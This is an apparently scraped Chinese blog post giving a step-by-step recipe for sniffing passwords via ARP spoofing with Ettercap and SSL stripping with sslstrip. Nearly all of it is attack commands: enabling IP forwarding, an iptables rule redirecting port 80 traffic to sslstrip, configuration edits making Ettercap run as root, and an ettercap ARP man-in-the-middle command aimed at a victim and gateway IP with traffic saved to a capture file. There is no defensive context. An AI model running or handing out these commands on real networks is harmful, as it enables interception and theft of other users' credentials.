zoukankan      html  css  js  c++  java
  • 利用SSLStrip & Ettercap ARP欺骗嗅探密码

    apt-get purge ettercap
    apt-get purge sslstrip
    apt-get install ettercap
    apt-get install sslstrip

    echo '1' > /proc/sys/net/ipv4/ip_forward

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

    sslstrip -l 8080


    # from http://blog.csdn.net/ghosttzs

    First you need to configure ettecap for sniffing a ssl connection. Open etter.confand edit the lines:
        
        [privs]
        ec_uid = 65534 # nobody is the default
        ec_gid = 65534 # nobody is the default


        to

        [privs]
        ec_uid = 0 # nobody is the default
        ec_gid = 0 # nobody is the default

        # if you use iptables:
        #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
        #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"


        to this

        # if you use iptables:
        redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"

        redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"


        Next information that you need is the victim ip and the gateway ip. Let's assume that the victim ip is 10.0.0.2 and the gateway is 10.0.0.1:

        ettercap -Tq -i eth0 -M arp:remote /10.0.0.2/ /10.0.0.1/  -w /root/Desktop/HiRoot/test.cap


    转载请注明出处

  • 相关阅读:
    07-selenium、PhantomJS(无头浏览器)
    06爬虫-异步协程
    Numpy数值类型与数值运算-03
    05爬虫-requests模块基础(2)
    初识Matplotlib-01
    03爬虫-requests模块基础(1)
    Django安装与简单事例-02
    JavaWeb学习总结(二):Http协议
    Tomcat学习总结(一):目录简介
    Web服务器学习总结(一):web服务器简介
  • 原文地址:https://www.cnblogs.com/y0umer/p/3838898.html
Copyright © 2011-2022 走看看